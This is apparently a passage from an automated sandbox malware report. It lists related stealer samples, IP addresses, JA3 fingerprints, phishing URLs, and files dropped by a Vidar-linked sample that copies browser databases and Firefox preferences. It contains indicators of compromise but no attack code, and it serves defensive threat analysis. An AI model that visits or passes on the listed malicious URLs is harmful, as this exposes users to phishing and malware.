                                                                                                                                                                                                                                                                      • 104.21.87.65
                                                                                                                                                                                                                                                                      IOnqEVA4Dz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 172.67.129.82
                                                                                                                                                                                                                                                                      HngJMpDqxP.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                                                      https://br.custmercompa.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 172.67.139.222
                                                                                                                                                                                                                                                                      tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                                                                      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                                                      • 104.21.85.189
                                                                                                                                                                                                                                                                      FASTLYUSEdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                                                                      5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      25F.tmp.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                                                                                                                                                      • 151.101.2.137
                                                                                                                                                                                                                                                                      https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                                                                      Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                                                                                                      https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                      • 151.101.194.137
                                                                                                                                                                                                                                                                      https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                                                      • 199.232.192.193
                                                                                                                                                                                                                                                                      https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 199.232.188.157
                                                                                                                                                                                                                                                                      eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                                                                      Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                      • 185.199.108.133

                                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      1138de370e523e824bbca92d049a3777https://redcap-int.istitutotumori.mi.it/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 23.1.237.91
                                                                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttp://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 34.160.111.145
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      IOnqEVA4Dz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      HngJMpDqxP.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      • 149.154.167.99

                                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comMatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                            AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                              0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                    !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8307282196546641
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugE:gJjJGtpTq2yv1AuNZRY3diu8iBVqFi
                                                                                                                                                                                                                                                                                          MD5:5B533DD9678D5C875B8BA681633B0368
                                                                                                                                                                                                                                                                                          SHA1:E3FD4EE1D98B23C1B86B0C836062D4E4C8CB5570
                                                                                                                                                                                                                                                                                          SHA-256:7B938AF7C696D4BCC389BB7DF5B42D4CE6981BD1DC9249E814EE9364523EA018
                                                                                                                                                                                                                                                                                          SHA-512:A778AAE8F1F3000DE34A02B3CE40BAA166F71968FCFACA13F4D3A5EC909B7A4F789FF78A55EFE685DF1B5AFC7F0FB24595E3F333A9E1C1E1FFEEA8A57C6DA203
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbcf5375a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6585956430171497
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                                                                          MD5:C41B7276B98B62F00BD0C25C14206CE3
                                                                                                                                                                                                                                                                                          SHA1:F26C696A5AAECD43C83225A437A5C72F4409A5B1
                                                                                                                                                                                                                                                                                          SHA-256:FBFAAF6829E3927A29EAA545F7FE425FE87CD72FE8E726A227A42E938437AA0B
                                                                                                                                                                                                                                                                                          SHA-512:FF7F525286D3C8EE4B4D6E46285F6CD97A49D46C49416D70F738FF6208D4DFEC7D871C9DFECF0605FB6E815C4EC149C734371F5EA15B8BF14A3FA202B61749A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..7Z... ...............X\...;...{......................0.z..........{..4:...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................F..;4:...|....................'.4:...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          File Type:DOS executable (COM)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08040073415741908
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:AKYem3mbrAkGuAJkhvekl1hC5/lillrekGltll/SPj:AKzyOrbrxlnmIJe3l
                                                                                                                                                                                                                                                                                          MD5:E939E650A4B9FB1B9A1AC3E7689A1C45
                                                                                                                                                                                                                                                                                          SHA1:AD096B039D824624B06B5A0019110B821E14764A
                                                                                                                                                                                                                                                                                          SHA-256:A58CBEF91F2D2097F1C0491E22F31C5C9A1F6FC36A276D11339BAE531C095ED6
                                                                                                                                                                                                                                                                                          SHA-512:A44B4572FBE629141AC802DD8CE2CA62C160133B111C14B78F8E55B796570BAEB5187CADBBC8A53A3C96818DE7A9A7758933BE3E6740A3CB5B7E2D8F6C709370
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.I.M.....................................;...{..4:...|.......{...............{.......{...XL......{....................'.4:...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\16fct0

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):155648
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\aie3w4

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2649203283896402
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:8/2qOB1nxCkMbSAELyKOMq+8yC8F/YfU5m+OlTLVumA:Bq+n0Jb9ELyKOMq+8y9/OwX
                                                                                                                                                                                                                                                                                          MD5:50E83BD889B028D25AEC0FF542C73E51
                                                                                                                                                                                                                                                                                          SHA1:CFB58A65011C3D03D1EBBCF63241B98D300D6A5E
                                                                                                                                                                                                                                                                                          SHA-256:473E1D65B83D254E2D8289EDEC15E87D7D92DDD98DE3E5D58B690DACFA2C3DEB
                                                                                                                                                                                                                                                                                          SHA-512:4CD58B04B203824653C928A1DC0FD6082668B9715C29B714AAB8EA128CB33046ED0483869A1EE538892C57402773EA44552A295F445FBE874FE44ABA54F62F0D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\d2djecbiw

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\fcbaaa

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\fu3opp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                          MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                          SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                          SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                          SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\k6fcj5

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9504
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                          MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                          SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                          SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                          SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\xlxt00

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\y5ppzmgln

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

